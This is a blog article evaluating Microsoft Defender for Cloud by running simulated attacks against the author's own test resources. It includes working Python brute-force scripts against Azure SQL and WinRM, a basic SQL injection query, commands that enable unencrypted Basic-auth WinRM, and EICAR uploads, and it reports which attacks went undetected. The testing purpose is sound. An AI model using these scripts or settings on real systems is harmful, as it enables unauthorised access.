Home > Defender for Cloud: Microsoft’s Security Monitoring Solution
Hichem Mabrouki
9 June 2022
Lire cet article en Français

Defender for Cloud: Microsoft’s Security Monitoring Solution

Defender for Cloud: Microsoft’s Security Monitoring Solution

As part of Hybridization Month, we present Microsoft Defender for Cloud, a solution for monitoring the security of public and private cloud resources and workloads. This article includes certain simulated attack types to demonstrate how the solution works and answer some questions:

  • What is Defender for workloads?
  • Does the solution protect or monitor other resources outside the Azure Cloud?
  • Is the protection/monitoring done in real time?
  • How can Microsoft Defender help make a hybrid infrastructure more secure?

 

 

A Presentation of Microsoft Defender for Cloud

 

Defender for Cloud is a Microsoft solution for monitoring the security of public and private (on-premise) cloud resources and workloads, such as databases, storage accounts, and key management services, in the Azure Cloud.

Because each resource has its own attack surface and vulnerabilities, Microsoft Defender is tailored to protect each specific resource. For example, protecting a storage account involves watching for malware loading, while protecting a database involves monitoring SQL queries and checking them for SQL injection attacks.

Some of the alerts that Defender for Cloud reports are common to all workloads, like access from a malicious IP address or an onion router (TOR) node.

In addition to monitoring for malicious activity, Microsoft Defender constantly checks the security status of workloads and resources. This assessment will help find and fix vulnerabilities and incorrect configurations.

Detected alerts are sent to the Azure Security Center, now called Microsoft Defender for Cloud. The interface provides an overview of the security status of all resources and workloads, details of any alerts and configuration problems with recommendations and corrective actions.

Defender for Cloud can be connected to a Security Information and Event Management (SIEM) system to improve how security alerts are managed. SIEM systems like Azure Sentinel can automate the alert management process. This makes it easier for the Security Operation Center (SOC) to manage security incidents and act on them quickly.

With Azure Arc technology, Microsoft Defender can be used to monitor servers in an on-premises cloud. Once the server is integrated via Azure Arc, Defender can be installed and managed on it.

 

The diagram below shows the Microsoft Defender for Cloud ecosystem, its interactions with security tools, and its integration with the various public (Azure, Amazon Web Services (AWS), Google Cloud Platform (GCP)), and private cloud environments.

 

l’écosystème de Microsoft Defender for Cloud

 

Next, we will look at the two main features of Microsoft Defender for Cloud:

  • Workload monitoring
  • Cloud security posture management

 

We will end with a summary of the solution’s strengths and areas for improvement.

 

 

Workload Monitoring with Microsoft Defender for Cloud

 

Microsoft Defender makes it possible to monitor the security of multiple workloads running in Azure Cloud:

  • Microsoft Defender for Servers
  • Microsoft Defender for Storage
  • Microsoft Defender for SQL
  • Microsoft Defender for Containers
  • Microsoft Defender for App Service
  • Microsoft Defender for Key Vault
  • Microsoft Defender for Resource Manager
  • Microsoft Defender for DNS
  • Microsoft Defender for open-source relational databases
  • Microsoft Defender for Azure Cosmos DB (Preview)

 

In this section, we show you how to use Microsoft Defender for specific workloads. A simulation will be run to check the operating mode, response time, and the alert sent to the Security Center.

 

Microsoft Defender for SQL

 

Introduction to Defender for SQL

 

Microsoft Defender for SQL monitoring detects unusual query patterns, database access, and suspicious database activity.

 

Here are some examples of unusual access and suspicious activities detected by Microsoft Defender for SQL:

  • Potential brute force attack using a valid user ID
  • Attempted connection by a potentially dangerous application
  • Login from a primary user not seen in 60 days
  • Login from an unusual Azure data center
  • Connection from a suspicious IP address

 

Microsoft Defender for SQL can monitor the following resources and workloads: Azure SQL Database, Microsoft SQL Managed Instance, Azure Arc-enabled SQL Server, SQL Server on Azure VM, SQL Server on AWS, SQL Server On-Prem.

 

 

Brute Force Attack Simulation

 

This is the oldest and most common type of attack. It involves trying all possible password/login combinations or using dictionaries (like lists of the most common passwords) to find a valid combination. This speeds up the execution time.

In this scenario, we will test how Microsoft Defender for SQL responds to a brute force attack.

  1. Create an Azure SQL “defender database.”
  2. Enable Defender for SQL in the newly created
  3. Download a password dictionary. There are several test dictionaries at this URL.
  4. Use the downloaded dictionary to create a Python script and open connections:
import pyodbc

server = ‘defender-sql.database.windows.net’

database = ‘defender-database’

username = ‘username’

driver= ‘{ODBC Driver 17 for SQL Server}’

filename= ‘french_passwords_top1000.txt’

 

# charger le dictionnaire depuis le fichier french_passwords_top1000.txt

with open(filename) as file:

    lines = [line.rstrip() for line in file]

    # pour chaque mot de passe essayer d’ouvrir une connexion

    for line in lines:

        print(‘Test de mot de passe:’ + line)

        try:

            password = line

            sqlconn= ‘DRIVER=’+driver+’;SERVER=tcp:’+server+’;PORT=1433;DATABASE=’+database+’;UID=’+username+’;PWD=’+ password

            with pyodbc.connect(sqlconn) as conn:

                with conn.cursor() as cursor:

                    cursor.execute(« SELECT @@Version »)

                    row = cursor.fetchall()

                    print(row)

                    print(« Mot de passe valide »)

        except:

            print(« mot de passe non valide »)

            continue

 

1. Run the script

Execution du script microsoft cloud defender

 

2. Check for a “Suspected brute-force attack attempt using a valid user” alert report

 

2) Check for a “Suspected brute-force attack

 

Microsoft Defender for Cloud orkshop collection

 

Microsoft Defender for Cloud security alert

 

SQL Injection Attack Simulation

 

This type of attack involves exploiting security vulnerabilities in the application code and running SQL queries on the database to extract information, access data without authorization, or add/delete data.

Here is the Python script to start a very basic SQL injection. The SQL query that this script generates can be inserted into an INPUT object or added to the URL parameters.

 

Simulation d’une attaque de type injection SQL

import pyodbc

server = ’defender-sql.database.windows.net’

database = ’defender-database’

username = ’username’

driver= ’{ODBC Driver 17 for SQL Server}’

password= ’{password}’

 

sqlconn= ’DRIVER=’+driver+’;SERVER=tcp:’+server+’;PORT=1433;DATABASE=’+database+’;UID=’+username+’;PWD=’+ password

print(sqlconn)

 

with pyodbc.connect(sqlconn) as conn:

    with conn.cursor() as cursor:

        # database search starting with l

        cursor.execute("select * from sys.databases where database_id like ’l%’")

        # display list of databases 

        cursor.execute("select * from sys.databases where database_id like ’’ or 1=1;select ’’ --Charbel3")

 

 

 

Check Alerts Reported in the Security Center

Microsoft Defender for Cloud alertes remontées au niveau de Security Center

 

Microsoft Defender for Storage

 

A Presentation of Microsoft Defender for Storage

Microsoft Defender for Storage can be used to monitor objects and data in a storage account. It uses advanced threat detection and Microsoft Threat Intelligence to detect unauthorized access, compromised credentials,s and data exfiltration, among other things.

An alert is sent to the operational security team whenever an attack or suspicious behavior is detected. The alert includes countermeasures to fix or mitigate the effects of each attack type.

 

Case Study: Loading Malware

To test if Microsoft Defender is working, we will load malware into the storage account and check to see if an alert is triggered:

  1. Create a “hmsourcecode” test storage account
  2. Enable Defender for Storage
  3. Download the EICAR test file and rename it testmalware.exe
  4. Upload the file to the hmsourcecode storage file
  5. A new alert is triggered in Microsoft Defender for Cloud (formerly the Security Center).

 

Microsoft Defender for Cloud alerte sécurité malware

 

You can use the same Microsoft Defender for Cloud interface to take corrective action.

 

Microsoft deferder for cloud actions correctives

 

 

Microsoft Defender for Non-Azure Resources

 

A Presentation of Defender for Non-Azure Machines

 

With the Azure Arc technology, you can now monitor the security posture of a machine that is not in the Azure Cloud.

 

To use the Defender for Cloud server, you must do the following:

1. Install the Azure Arc agent on the target machine:

 

Installation Azure Arc

 

2. The “Log Analytics Agent” must be installed on the target machine if the operating system (OS) is not supported.

3. Register the server.

 

Defernder for Cloud Azure Arc

 

Defender for Cloud azure Arc installation

 

Azure connected machine agent Microsoft

 

4. Azure portal verification:

Go to Azure Arc and check that the server has been added and successfully connected

 

vérification connection Azure Arc au serveur

 

 

Case Study: Downloading Malware

To test if Microsoft Defender is working on non-Azure resources, we will download the EICAR malware and check to see if an alert is triggered.

1. Download the EICAR test file and rename it testmalware.exe. A new alert is triggered in Microsoft Defender for Cloud:

 

Remontée d'alerte dans Microsoft Defender for Cloud

 

Alert details:

Microsoft Defender for Cloud détails de l'alerte

 

 

Simulation of a Brute Force Attack Not Detected by Defender for Cloud

 

This is the same kind of attack that we performed on the SQL database. It involves trying all possible password/login combinations or using dictionaries (like the one of the most common passwords) to find a valid combination. This speeds up the execution time.

Here, we will test how Microsoft Defender responds to a brute force attack on a non-Azure resource.

 

1. Prepare the target machine

Install the Azure Arc agent on the target machine and register it.

Run the following commands on the target machine to enable Winrm with basic authentication:

  • Enable-PSremoting -Force
  • Restart-Service WinRM
  • winrm set winrm/config/service ’@{AllowUnencrypted=”true”}’
  • winrm set winrm/config/service/auth ’@{Basic=”true”}’

Restart-Service WinRM.

 

After running these commands, you can open a remote winrm session:

 

2. Download a password dictionary (there are several test dictionaries at this URL)

3. Use the downloaded dictionary to create a Python script and open sessions

4. Install the pywinrm package

import winrm

host = ’XXX.XXX.XXX.XXX’

user = ’UserName’

filename= ’french_passwords_top1000.txt’

 

# load dictionary from the file french_passwords_top1000.txt

with open(filename) as file:

    lines = [line.rstrip() for line in file]

    # try to open a winrm connection for each password

    for password in lines:

        print(’Password test:’ + password)

        try:

            session = winrm.Session(host, auth=(user,password))

            result = session.run_cmd(’hostname’)

            print(result)

            print("Valid password")

        except:

            print("Invalid password")

            continue

 

5. Run the script

 

Microsoft defender for cloud exécution du script

 

6. Azure portal check: no alert reported in Microsoft Defender for Cloud.

 

Cloud Security Posture Management with Microsoft Defender for Cloud

 

This feature provides an overall assessment of the security of the entire Cloud environment is that Defender for Cloud is monitoring. Microsoft Defender for Cloud continuously assesses deployed resources and workloads against security benchmarks and Azure Center for Internet Security (CIS) and National Institute of Standards and Technology (NIST) best practice guides.

The Microsoft Defender for Cloud overview shows the overall score and security posture details.

 

Overall Score

 

This assessment is based on the security benchmarking recommendations. The score may decrease if a resource is misconfigured or the OS hosting the resource has a security vulnerability.

The score can also increase if a misconfiguration is corrected or the OS hosting the service is updated.

 

Mirosoft Defender for Cloud overview

 

 

Security Posture Details

 

Clicking the “Explore your security posture” link takes you to a different page with more information about the list of recommendations.

Each recommendation shows the steps to fix the issue, the resources involved, and the potential score increase if the problem was fixed.

 

Example recommendation:

Name: Enable MFA

This recommendation is to enable multi-factor authentication (MFA) for accounts with write or proprietary permissions.

If MFA is enabled, the overall compliance score will increase by 10 points.

 

Microsoft Defender for Cloud recommandations

 

 

Microsoft Defender for Cloud: Key Takeaways

 

Microsoft Defender for Cloud is one of the best security solutions on the market right now for monitoring cloud resources and workloads.

 

Microsoft Defender for Cloud Highlights

 

  • Each type of resource or workload has its own Defender. For example, all you have to do to protect an SQL database is enable Defender for SQL. The latter monitors for SQL injections, brute force attacks, or connections from a malicious IP address, etc.
  • The recommendations made after the configuration and vulnerability assessment are also specific to each resource or workload.
  • The solution can be integrated with an SIEM for better security alert management and to improve the operational security team’s response.

 

Microsoft Defender for Cloud Areas for Improvement

 

  • Reduce detection time: when attacks were simulated, some were reported several hours after they occurred. Even if alert management was automated, this would still be too late to take corrective action.
  • Defender for Cloud does not detect all types of attacks, for example, SQL injections. It’s important to remember that Defender for Cloud is only one line of defense. Strengthening security with other tools, such as a Web Application Firewall (WAF), provides real-time protection and is a better way of protecting against this type of attack.

Keep in mind that there is a trade-off between security and productivity. Activating security tools can have a significant impact on the development environment. For example, a misconfigured WAF can block legitimate traffic or Defender for SQL. This can result in false alerts for legitimate SQL queries.

 

Do you have experience with Microsoft Defender for Cloud? Would you like to share your opinion of this tool? Leave us a comment below!

See all the Hybridization Month posts below:

This posts should interest you
Comments
Leave a Reply

Your email address will not be published.

Receive the best of Cloud, DevOps and IT news.
Receive the best of Cloud, DevOps and IT news.